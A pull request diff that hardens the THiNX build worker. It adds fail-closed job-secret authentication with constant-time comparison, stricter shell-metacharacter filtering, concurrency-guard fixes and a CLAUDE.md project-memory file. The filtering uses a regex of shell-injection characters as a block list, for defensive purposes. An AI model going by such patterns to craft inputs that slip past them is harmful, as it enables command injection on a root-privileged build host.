### PR TITLE
Harden build worker (injection, auth, secrets, concurrency) + fix failing tests

### DIFF
--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -1,0 +1,48 @@
+# CLAUDE.md — THiNX Build Worker
+
+Project memory for the THiNX Cloud Build Worker (`build-worker`). Loaded automatically each session.
+
+## What this service is
+
+A swarm build worker: it connects over socket.io to the THiNX API, receives build
+`job` events, and runs the build command on the host via `child_process.spawn`.
+Entry point `worker.js` → `class.js` (`Worker`).
+
+## Operational constraints
+
+### The container must run as root (intentional, do not "fix")
+
+The Docker container runs as **root** (the `USER` directive in `Dockerfile` is
+deliberately commented out). This is **required**, not an oversight:
+
+- The worker spawns **builder containers** by talking to the host's Docker daemon
+  via `docker.sock`. Doing that needs root (or membership in a `docker` group that
+  is effectively root-equivalent).
+- This is how THiNX build orchestration currently works, and **no better method
+  has been researched yet**.
+- THiNX must run in **both plain Docker and Docker Swarm**, so a swarm-level
+  orchestrator cannot be made a hard requirement — the worker has to be able to
+  launch builders itself in either environment.
+
+If you revisit container hardening: rootless Docker / a brokered build-launch API
+would be the direction to research, but until that exists, **root is the accepted
+trade-off**. Do not drop `USER root` expecting it to be a safe cleanup.
+
+Security note: because the worker has root + `docker.sock` and executes
+remote-supplied build commands, the command-injection guards in
+`class.js` (`isArgumentSafe`, `validateJob`) and job authentication
+(`WORKER_SECRET`, constant-time `secretsMatch`) are the primary containment layer.
+Keep them strict.
+
+## Secrets
+
+`WORKER_SECRET` and `ROLLBAR_ACCESS_TOKEN` are **injected at runtime** (e.g.
+`docker run -e ...`), not baked into the image. Do not re-add them as
+`ARG`/`ENV` in the `Dockerfile` — that would persist them in image layers.
+
+## Testing
+
+`npm test` (Jest). Two pre-existing tests fail independently of feature work:
+`runShell` (`chmodr is not a function`) and `socket must be closed`
+(`w.close is not a function` — no `close()` method exists on `Worker`). These are
+known broken tests, not regressions.

--- a/Dockerfile
+++ b/Dockerfile
@@ -6,17 +6,16 @@ LABEL name="thinxcloud/worker" version="1.7.167"
 
 RUN echo "http://dl-cdn.alpinelinux.org/alpine/edge/community" >> /etc/apk/repositories
 
+# Non-secret build configuration only. Secrets (WORKER_SECRET, ROLLBAR_ACCESS_TOKEN)
+# MUST be provided at runtime (e.g. `docker run -e WORKER_SECRET=... -e ROLLBAR_ACCESS_TOKEN=...`
+# or via a secrets manager) so they are never baked into image layers / `docker history`.
 ARG THINX_SERVER
-ARG ROLLBAR_ACCESS_TOKEN
 ARG ROLLBAR_ENVIRONMENT
-ARG WORKER_SECRET
 ARG REVISION
 ARG DATA_PATH
 
 ENV THINX_SERVER=${THINX_SERVER}
-ENV ROLLBAR_ACCESS_TOKEN=${ROLLBAR_ACCESS_TOKEN}
 ENV ROLLBAR_ENVIRONMENT=${ROLLBAR_ENVIRONMENT}
-ENV WORKER_SECRET=${WORKER_SECRET}
 ENV REVISION=${REVISION}
 ENV WORKER=1
 ENV DATA_PATH=${DATA_PATH}

--- a/class.js
+++ b/class.js
@@ -130,6 +130,7 @@ module.exports = class Worker {
         // Validate using whitelist regex to prevent command injection
         if (!this.isBuildIDValid(build_id)) {
             console.log(`"[OID:${owner}] [BUILD_FAILED] Owner submitted invalid request...`);
+            this.running = false; // release the guard; no build was started
             return;
         }
 
@@ -147,6 +148,7 @@ module.exports = class Worker {
             if ( (tome.indexOf("--git=") !== -1) || (tome.indexOf("--branch=") !== -1)) {
                 if (!this.isArgumentSafe(tome)) {
                     console.log(`[error] Tome ${tome} invalid, suspected command injection, exiting!`);
+                    this.running = false; // release the guard; no build was started
                     return;
                 }
             }
@@ -250,6 +252,19 @@ module.exports = class Worker {
 			}
 		}); // end shell on error data
 
+		shell.on("error", (err) => {
+            // spawn failed to launch (e.g. ENOENT); without this the 'error' event
+            // would be unhandled and the running guard would never be released.
+            console.log(`[OID:${owner}] [BUILD_FAILED] Worker failed to start build: ${err}`);
+            this.running = false;
+            socket.emit('job-status', {
+                udid: udid,
+                build_id: build_id,
+                state: "Failed",
+                reason: String(err)
+            });
+		}); // end shell on error
+
 		shell.on("exit", (code) => {
 
             console.log(`[OID:${owner}] [BUILD_COMPLETED] with code ${code}`);
@@ -317,15 +332,18 @@ module.exports = class Worker {
                 return;
             }
             console.log(new Date().getTime(), `» Worker has new job:`, data);
+            // runJob sets this.running = true and starts the build asynchronously
+            // (runShell uses child_process.spawn). The flag is cleared only when the
+            // build actually finishes — in shell 'exit'/'error', the fatal-stderr
+            // branch, failJob, or runShell's early validation returns. Do NOT clear it
+            // here: the build is still in progress, and clearing it would let a second
+            // job start concurrently on this worker.
             if (typeof(data.mock) === "undefined" || data.mock !== true) {
                 this.client_id = data;
                 this.runJob(socket, data);
-                this.running = false;
-                console.log(`${new Date().getTime()} [info] » Job synchronously completed.`);
             } else {
                 console.log(`${new Date().getTime()} [info] » This is a MOCK job`);
                 this.runJob(socket, data);
-                this.running = false;
             }
         });
     }

--- a/class.js
+++ b/class.js
@@ -121,7 +121,7 @@ module.exports = class Worker {
         return !dangerous.test(CMD);
     }
 
-    runShell(CMD, owner, build_id, udid, path, socket) {
+    runShell(CMD, owner, build_id, udid, path, socket, callback) {
 
         // Prevent injection through git, branch
 
@@ -131,6 +131,7 @@ module.exports = class Worker {
         if (!this.isBuildIDValid(build_id)) {
             console.log(`"[OID:${owner}] [BUILD_FAILED] Owner submitted invalid request...`);
             this.running = false; // release the guard; no build was started
+            if (typeof(callback) === "function") callback();
             return;
         }
 
@@ -149,6 +150,7 @@ module.exports = class Worker {
                 if (!this.isArgumentSafe(tome)) {
                     console.log(`[error] Tome ${tome} invalid, suspected command injection, exiting!`);
                     this.running = false; // release the guard; no build was started
+                    if (typeof(callback) === "function") callback();
                     return;
                 }
             }
@@ -263,6 +265,7 @@ module.exports = class Worker {
                 state: "Failed",
                 reason: String(err)
             });
+            if (typeof(callback) === "function") callback(err);
 		}); // end shell on error
 
 		shell.on("exit", (code) => {
@@ -280,8 +283,12 @@ module.exports = class Worker {
             }
 
             const close_underlying_connection = true; // should be true, having it false does not help failing builds
-            socket.disconnect(close_underlying_connection);
-            
+            if (typeof(socket.disconnect) === "function") {
+                socket.disconnect(close_underlying_connection);
+            }
+
+            if (typeof(callback) === "function") callback(code);
+
 		}); // end shell on exit
 	}
 
@@ -324,6 +331,11 @@ module.exports = class Worker {
         socket.on('job', (data) => { 
             if (this.running == true) {
                 console.log(`${new Date().getTime()} This worker is already running... passing job ${data}`);
+                return;
+            }
+            // Ignore empty payloads before dereferencing them (data.path below).
+            if (data === null || typeof(data) === "undefined") {
+                console.log(`${new Date().getTime()} [warning] Ignoring empty job payload.`);
                 return;
             }
             // Prevent path traversal by rejecting insane values

--- a/class.js
+++ b/class.js
@@ -8,6 +8,7 @@ if (typeof(process.env.ROLLBAR_TOKEN) !== "undefined") {
 }
 
 const exec = require("child_process");
+const crypto = require("crypto");
 const version = require('./package.json').version;
 const io = require('socket.io-client');
 const fs = require("fs-extra");
@@ -43,12 +44,8 @@ module.exports = class Worker {
         }
 
         let command = job.cmd;
-        if (command.indexOf(";") !== -1) {
-            console.log(`${new Date().getTime()} Remote command contains unexpected character ';'; this security incident should be reported.`);
-            return false;
-        }
-        if (command.indexOf("&") !== -1) {
-            console.log(`${new Date().getTime()} Remote command contains unexpected character '&'; this security incident should be reported.`);
+        if (!this.isArgumentSafe(command)) {
+            console.log(`${new Date().getTime()} Remote command contains unexpected shell metacharacters; this security incident should be reported.`);
             return false;
         }
 
@@ -62,24 +59,38 @@ module.exports = class Worker {
             return false;
         }
 
-        if (typeof(process.env.WORKER_SECRET) !== "undefined") {
-            if (typeof(job.secret) === "undefined") {
-                this.failJob(sock, job, "Missing job secret");
-                return false;
-            } else {
-                if (job.secret === null) {
-                    console.log(`${new Date().getTime()} Warning, JOB SECRET NULL! This will be error soon. ${job}`);
-                    return false;
-                } else {
-                    if (job.secret.indexOf(process.env.WORKER_SECRET) !== 0) {
-                        this.failJob(sock, job, "Invalid job authentication");
-                        return false;
-                    } 
-                }
-            }
+        // Fail closed: a worker without a configured secret must never run remote jobs.
+        const workerSecret = process.env.WORKER_SECRET;
+        if (typeof(workerSecret) === "undefined" || workerSecret === null || workerSecret === "") {
+            console.log(`${new Date().getTime()} [critical] WORKER_SECRET is not configured; refusing job. Set WORKER_SECRET to enable authenticated builds.`);
+            return false;
+        }
+
+        if (typeof(job.secret) === "undefined" || job.secret === null) {
+            this.failJob(sock, job, "Missing job secret");
+            return false;
+        }
+
+        if (!this.secretsMatch(job.secret, workerSecret)) {
+            this.failJob(sock, job, "Invalid job authentication");
+            return false;
         }
 
         return true;
+    }
+
+    // Constant-time secret comparison to avoid timing side channels.
+    // Returns true only on exact, equal-length match.
+    secretsMatch(provided, expected) {
+        if (typeof(provided) !== "string" || typeof(expected) !== "string") {
+            return false;
+        }
+        const a = Buffer.from(provided);
+        const b = Buffer.from(expected);
+        if (a.length !== b.length) {
+            return false;
+        }
+        return crypto.timingSafeEqual(a, b);
     }
 
     runJob(sock, job) {
@@ -100,8 +111,14 @@ module.exports = class Worker {
     }
 
     isArgumentSafe(CMD) {
-        var pattern = new RegExp("(?![;&]+)");
-        return pattern.test(CMD);
+        if (typeof(CMD) !== "string") {
+            return false;
+        }
+        // Reject shell metacharacters that enable command chaining, substitution,
+        // piping or redirection. Legitimate build commands are a single program
+        // invocation with `--flag=value` arguments and contain none of these.
+        var dangerous = /[;&|`$()<>\n\r\\]/;
+        return !dangerous.test(CMD);
     }
 
     runShell(CMD, owner, build_id, udid, path, socket) {
@@ -126,7 +143,7 @@ module.exports = class Worker {
         // preprocess
         let tomes = CMD.split(" ");
 
-        for (let tome in tomes) {
+        for (let tome of tomes) {
             if ( (tome.indexOf("--git=") !== -1) || (tome.indexOf("--branch=") !== -1)) {
                 if (!this.isArgumentSafe(tome)) {
                     console.log(`[error] Tome ${tome} invalid, suspected command injection, exiting!`);

--- a/package-lock.json
+++ b/package-lock.json
@@ -10,7 +10,7 @@
       "license": "ISC",
       "dependencies": {
         "chalk": "^5.6.2",
-        "chmodr": "^2.0.0",
+        "chmodr": "^1.2.0",
         "express": "^5.2.0",
         "fs-extra": "^11.3.2",
         "helmet": "^8.1.0",
@@ -22,18 +22,18 @@
       },
       "devDependencies": {
         "jest": "^30.2.0",
-        "jest-junit": "^16.0.0",
+        "jest-junit": "^17.0.0",
         "jest-sonar-reporter": "^2.0.0"
       }
     },
     "node_modules/@babel/code-frame": {
-      "version": "7.29.0",
-      "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.29.0.tgz",
-      "integrity": "sha512-9NhCeYjq9+3uxgdtp20LSiJXJvN0FeCtNGpJxuMFZ1Kv3cWUNb6DOhJwUvcVCzKGR66cw4njwM6hrJLqgOwbcw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.29.7.tgz",
+      "integrity": "sha512-Aup7aUOfpbAUg2ROOJN6Iw5f9DMBlzu0mIkm/malLQFN/YQgO48wCj0Kxa3sEHJvPVFg7siR+qRInwXd2qhQKw==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-validator-identifier": "^7.28.5",
+        "@babel/helper-validator-identifier": "^7.29.7",
         "js-tokens": "^4.0.0",
         "picocolors": "^1.1.1"
       },
@@ -42,9 +42,9 @@
       }
     },
     "node_modules/@babel/compat-data": {
-      "version": "7.29.3",
-      "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.29.3.tgz",
-      "integrity": "sha512-LIVqM46zQWZhj17qA8wb4nW/ixr2y1Nw+r1etiAWgRM6U1IqP+LNhL1yg440jYZR72jCWcWbLWzIosH+uP1fqg==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.29.7.tgz",
+      "integrity": "sha512-locTkQyKvwIEgBzVrn8693ebc97F2U8ZHjbXwDXJ5Fn2TCpNwTlKcaKLkdHop5c/icOFE7qt7Q9JC5hnKNa6Gg==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -52,21 +52,21 @@
       }
     },
     "node_modules/@babel/core": {
-      "version": "7.29.0",
-      "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.29.0.tgz",
-      "integrity": "sha512-CGOfOJqWjg2qW/Mb6zNsDm+u5vFQ8DxXfbM09z69p5Z6+mE1ikP2jUXw+j42Pf1XTYED2Rni5f95npYeuwMDQA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.29.7.tgz",
+      "integrity": "sha512-RgHBCvtjbOK2gXSNBNIkNoEc9qoVEtau3hj8gEqKQuL3HZAibKarWFEI3Lfm6EYKkLalOh8eSrj9b+ch9H/VBA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/code-frame": "^7.29.0",
-        "@babel/generator": "^7.29.0",
-        "@babel/helper-compilation-targets": "^7.28.6",
-        "@babel/helper-module-transforms": "^7.28.6",
-        "@babel/helpers": "^7.28.6",
-        "@babel/parser": "^7.29.0",
-        "@babel/template": "^7.28.6",
-        "@babel/traverse": "^7.29.0",
-        "@babel/types": "^7.29.0",
+        "@babel/code-frame": "^7.29.7",
+        "@babel/generator": "^7.29.7",
+        "@babel/helper-compilation-targets": "^7.29.7",
+        "@babel/helper-module-transforms": "^7.29.7",
+        "@babel/helpers": "^7.29.7",
+        "@babel/parser": "^7.29.7",
+        "@babel/template": "^7.29.7",
+        "@babel/traverse": "^7.29.7",
+        "@babel/types": "^7.29.7",
         "@jridgewell/remapping": "^2.3.5",
         "convert-source-map": "^2.0.0",
         "debug": "^4.1.0",
@@ -83,14 +83,14 @@
       }
     },
     "node_modules/@babel/generator": {
-      "version": "7.29.1",
-      "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.29.1.tgz",
-      "integrity": "sha512-qsaF+9Qcm2Qv8SRIMMscAvG4O3lJ0F1GuMo5HR/Bp02LopNgnZBC/EkbevHFeGs4ls/oPz9v+Bsmzbkbe+0dUw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.29.7.tgz",
+      "integrity": "sha512-DkXD5OJQaAQIdZ1bt3UZdEnHAn9Imd3IVBdX03UFe+ony9Ojw5pzr9YVKGDY1jt+Gcn/FnGkNf8r+Vj5NOJWtQ==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/parser": "^7.29.0",
-        "@babel/types": "^7.29.0",
+        "@babel/parser": "^7.29.7",
+        "@babel/types": "^7.29.7",
         "@jridgewell/gen-mapping": "^0.3.12",
         "@jridgewell/trace-mapping": "^0.3.28",
         "jsesc": "^3.0.2"
@@ -100,14 +100,14 @@
       }
     },
     "node_modules/@babel/helper-compilation-targets": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.28.6.tgz",
-      "integrity": "sha512-JYtls3hqi15fcx5GaSNL7SCTJ2MNmjrkHXg4FSpOA/grxK8KwyZ5bubHsCq8FXCkua6xhuaaBit+3b7+VZRfcA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.29.7.tgz",
+      "integrity": "sha512-wem6WaBj4NaVYVdNhLPPVacES6ZJ+KBBfSkTMD3YZxbP3rm3Di85tJU5ljaUNhaOynt+Aj0xruhYuzQBt8n71g==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/compat-data": "^7.28.6",
-        "@babel/helper-validator-option": "^7.27.1",
+        "@babel/compat-data": "^7.29.7",
+        "@babel/helper-validator-option": "^7.29.7",
         "browserslist": "^4.24.0",
         "lru-cache": "^5.1.1",
         "semver": "^6.3.1"
@@ -117,9 +117,9 @@
       }
     },
     "node_modules/@babel/helper-globals": {
-      "version": "7.28.0",
-      "resolved": "https://registry.npmjs.org/@babel/helper-globals/-/helper-globals-7.28.0.tgz",
-      "integrity": "sha512-+W6cISkXFa1jXsDEdYA8HeevQT/FULhxzR99pxphltZcVaugps53THCeiWA8SguxxpSp3gKPiuYfSWopkLQ4hw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-globals/-/helper-globals-7.29.7.tgz",
+      "integrity": "sha512-3nQVUAtvkKH9zahfWgw96Jc/uFOmjACE1kQz82E2lqWmHBgjzbNlsC22nuQTfahmWeQtTq5nQ/4Nnd2A1wj4zA==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -127,29 +127,29 @@
       }
     },
     "node_modules/@babel/helper-module-imports": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.28.6.tgz",
-      "integrity": "sha512-l5XkZK7r7wa9LucGw9LwZyyCUscb4x37JWTPz7swwFE/0FMQAGpiWUZn8u9DzkSBWEcK25jmvubfpw2dnAMdbw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.29.7.tgz",
+      "integrity": "sha512-ejHwrQQYcm9xnTivShn2IDOlIzInN34AXskvq9QicvCtEzq1Vzclu/tKF8Jq1Cg8JG2GL6/EmjgsCT7lXepE3g==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/traverse": "^7.28.6",
-        "@babel/types": "^7.28.6"
+        "@babel/traverse": "^7.29.7",
+        "@babel/types": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
       }
     },
     "node_modules/@babel/helper-module-transforms": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.28.6.tgz",
-      "integrity": "sha512-67oXFAYr2cDLDVGLXTEABjdBJZ6drElUSI7WKp70NrpyISso3plG9SAGEF6y7zbha/wOzUByWWTJvEDVNIUGcA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.29.7.tgz",
+      "integrity": "sha512-UPUVSyXbOh627KiCIGQSgwWzGeBKLkaJ9PJEdrngIwMSzxLR4jS4+f1f1jb7VzBbg8nFLaYotvVPFCTqdrmTAg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-module-imports": "^7.28.6",
-        "@babel/helper-validator-identifier": "^7.28.5",
-        "@babel/traverse": "^7.28.6"
+        "@babel/helper-module-imports": "^7.29.7",
+        "@babel/helper-validator-identifier": "^7.29.7",
+        "@babel/traverse": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
@@ -159,9 +159,9 @@
       }
     },
     "node_modules/@babel/helper-plugin-utils": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.28.6.tgz",
-      "integrity": "sha512-S9gzZ/bz83GRysI7gAD4wPT/AI3uCnY+9xn+Mx/KPs2JwHJIz1W8PZkg2cqyt3RNOBM8ejcXhV6y8Og7ly/Dug==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.29.7.tgz",
+      "integrity": "sha512-G7sHYigPY17oO5SYWnfD/0MTBwVR781S/JI643e/JhUYgVgWE/61SoW3NH9KWUKyKq5LVh3npif99Wkt6j86Jw==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -169,9 +169,9 @@
       }
     },
     "node_modules/@babel/helper-string-parser": {
-      "version": "7.27.1",
-      "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz",
-      "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.29.7.tgz",
+      "integrity": "sha512-Pb5ijPrZ89GDH8223L4UP8i6QApWxs04RbPQJTeWDV0/keR2E36MeKnyr6LYmUUvqRRI+Iv87SuF1W6ErINzYw==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -179,9 +179,9 @@
       }
     },
     "node_modules/@babel/helper-validator-identifier": {
-      "version": "7.28.5",
-      "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.28.5.tgz",
-      "integrity": "sha512-qSs4ifwzKJSV39ucNjsvc6WVHs6b7S03sOh2OcHF9UHfVPqWWALUsNUVzhSBiItjRZoLHx7nIarVjqKVusUZ1Q==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.29.7.tgz",
+      "integrity": "sha512-qehxGkRj55h/ff8EMaJ+cYhyaKlHIxqYDn682wQD7RNp9UujOQsHog2uS0r2vzr4pW+sXf90NeeayjcNaX3fFg==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -189,9 +189,9 @@
       }
     },
     "node_modules/@babel/helper-validator-option": {
-      "version": "7.27.1",
-      "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.27.1.tgz",
-      "integrity": "sha512-YvjJow9FxbhFFKDSuFnVCe2WxXk1zWc22fFePVNEaWJEu8IrZVlda6N0uHwzZrUM1il7NC9Mlp4MaJYbYd9JSg==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.29.7.tgz",
+      "integrity": "sha512-N9ZErrD+yW5geCDtBqnOoxmR8+tNKiGuxKlDpuJxfsqpa2dFcexaziGAE/qoHLiDDreVNMupxGmSoNlyvsA3gw==",
       "dev": true,
       "license": "MIT",
       "engines": {
@@ -199,27 +199,27 @@
       }
     },
     "node_modules/@babel/helpers": {
-      "version": "7.29.2",
-      "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.29.2.tgz",
-      "integrity": "sha512-HoGuUs4sCZNezVEKdVcwqmZN8GoHirLUcLaYVNBK2J0DadGtdcqgr3BCbvH8+XUo4NGjNl3VOtSjEKNzqfFgKw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.29.7.tgz",
+      "integrity": "sha512-1k2lAGRMfHTcwuNYcCNUmaUffmQv8KWMfh2iJUUeRlwlwH4FdNG7mfPI10NPfLHJFThE4Tyr4mv7kTNZOiPuBg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/template": "^7.28.6",
-        "@babel/types": "^7.29.0"
+        "@babel/template": "^7.29.7",
+        "@babel/types": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
       }
     },
     "node_modules/@babel/parser": {
-      "version": "7.29.3",
-      "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.29.3.tgz",
-      "integrity": "sha512-b3ctpQwp+PROvU/cttc4OYl4MzfJUWy6FZg+PMXfzmt/+39iHVF0sDfqay8TQM3JA2EUOyKcFZt75jWriQijsA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.29.7.tgz",
+      "integrity": "sha512-hnORnjP/1P/zFEndoeX+n+t1RwWRJiJpM/jO7FW32Kn9r5+sJB2JWOdYo4L6k78j15eCwY3Gm/7364B1EMwtNg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/types": "^7.29.0"
+        "@babel/types": "^7.29.7"
       },
       "bin": {
         "parser": "bin/babel-parser.js"
@@ -284,13 +284,13 @@
       }
     },
     "node_modules/@babel/plugin-syntax-import-attributes": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.28.6.tgz",
-      "integrity": "sha512-jiLC0ma9XkQT3TKJ9uYvlakm66Pamywo+qwL+oL8HJOvc6TWdZXVfhqJr8CCzbSGUAbDOzlGHJC1U+vRfLQDvw==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-attributes/-/plugin-syntax-import-attributes-7.29.7.tgz",
+      "integrity": "sha512-zGYcYfq/WmZ4V+kBIXQon9dSSc8ircGZqw9ZaNhhGj9nZkeBu1jHLBDQqYYi5WA9uawvA2sIMbry2nCFhf5Djg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-plugin-utils": "^7.28.6"
+        "@babel/helper-plugin-utils": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
@@ -326,13 +326,13 @@
       }
     },
     "node_modules/@babel/plugin-syntax-jsx": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.28.6.tgz",
-      "integrity": "sha512-wgEmr06G6sIpqr8YDwA2dSRTE3bJ+V0IfpzfSY3Lfgd7YWOaAdlykvJi13ZKBt8cZHfgH1IXN+CL656W3uUa4w==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.29.7.tgz",
+      "integrity": "sha512-TSu8+mHCoEaaCDEZ0I3+6mvTBYR4PCxQwf2z9/r5Tbztv6NaLR3B9thGTTxX2WGuGHJqRiAbKPeGTJ5XWXVg6A==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-plugin-utils": "^7.28.6"
+        "@babel/helper-plugin-utils": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
@@ -452,13 +452,13 @@
       }
     },
     "node_modules/@babel/plugin-syntax-typescript": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.28.6.tgz",
-      "integrity": "sha512-+nDNmQye7nlnuuHDboPbGm00Vqg3oO8niRRL27/4LYHUsHYh0zJ1xWOz0uRwNFmM1Avzk8wZbc6rdiYhomzv/A==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.29.7.tgz",
+      "integrity": "sha512-ngr+82Sh0xMz25TPCZi+nC2iTzjfCdWS2ONXTp/PtSCHCgaCNBpdMqgvJ2ccdLlClVZ7sisIgB914j/JFe+RZA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-plugin-utils": "^7.28.6"
+        "@babel/helper-plugin-utils": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
@@ -468,33 +468,33 @@
       }
     },
     "node_modules/@babel/template": {
-      "version": "7.28.6",
-      "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.28.6.tgz",
-      "integrity": "sha512-YA6Ma2KsCdGb+WC6UpBVFJGXL58MDA6oyONbjyF/+5sBgxY/dwkhLogbMT2GXXyU84/IhRw/2D1Os1B/giz+BQ==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.29.7.tgz",
+      "integrity": "sha512-puq+Gf35oI24FeN11LkoUQFqv9uwNeWpxXZi/Ji3rRIoKAzKnxRaZ+Gkj0vKS9ZCiTESfng1N9LyOyXvo+m+Gg==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/code-frame": "^7.28.6",
-        "@babel/parser": "^7.28.6",
-        "@babel/types": "^7.28.6"
+        "@babel/code-frame": "^7.29.7",
+        "@babel/parser": "^7.29.7",
+        "@babel/types": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
       }
     },
     "node_modules/@babel/traverse": {
-      "version": "7.29.0",
-      "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.29.0.tgz",
-      "integrity": "sha512-4HPiQr0X7+waHfyXPZpWPfWL/J7dcN1mx9gL6WdQVMbPnF3+ZhSMs8tCxN7oHddJE9fhNE7+lxdnlyemKfJRuA==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.29.7.tgz",
+      "integrity": "sha512-EhlfNQtZ+NK22w5BM61ciuiq1m58ed33Wr1Xan//ZRTy6hgjnwyCffRYwzsGXdASJSUJ1guZILsErh1eQcl+zw==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/code-frame": "^7.29.0",
-        "@babel/generator": "^7.29.0",
-        "@babel/helper-globals": "^7.28.0",
-        "@babel/parser": "^7.29.0",
-        "@babel/template": "^7.28.6",
-        "@babel/types": "^7.29.0",
+        "@babel/code-frame": "^7.29.7",
+        "@babel/generator": "^7.29.7",
+        "@babel/helper-globals": "^7.29.7",
+        "@babel/parser": "^7.29.7",
+        "@babel/template": "^7.29.7",
+        "@babel/types": "^7.29.7",
         "debug": "^4.3.1"
       },
       "engines": {
@@ -502,14 +502,14 @@
       }
     },
     "node_modules/@babel/types": {
-      "version": "7.29.0",
-      "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.29.0.tgz",
-      "integrity": "sha512-LwdZHpScM4Qz8Xw2iKSzS+cfglZzJGvofQICy7W7v4caru4EaAmyUuO6BGrbyQ2mYV11W0U8j5mBhd14dd3B0A==",
+      "version": "7.29.7",
+      "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.29.7.tgz",
+      "integrity": "sha512-4zBIxpPzowiZpusoFkyGVwakdRJUyuH5PxQ/PrqghfdFWWasvnCdPfQXHrenDai+gyLARulZjZowCOj6fjT4pA==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
-        "@babel/helper-string-parser": "^7.27.1",
-        "@babel/helper-validator-identifier": "^7.28.5"
+        "@babel/helper-string-parser": "^7.29.7",
+        "@babel/helper-validator-identifier": "^7.29.7"
       },
       "engines": {
         "node": ">=6.9.0"
@@ -1221,13 +1221,13 @@
       }
     },
     "node_modules/@pkgr/core": {
-      "version": "0.2.9",
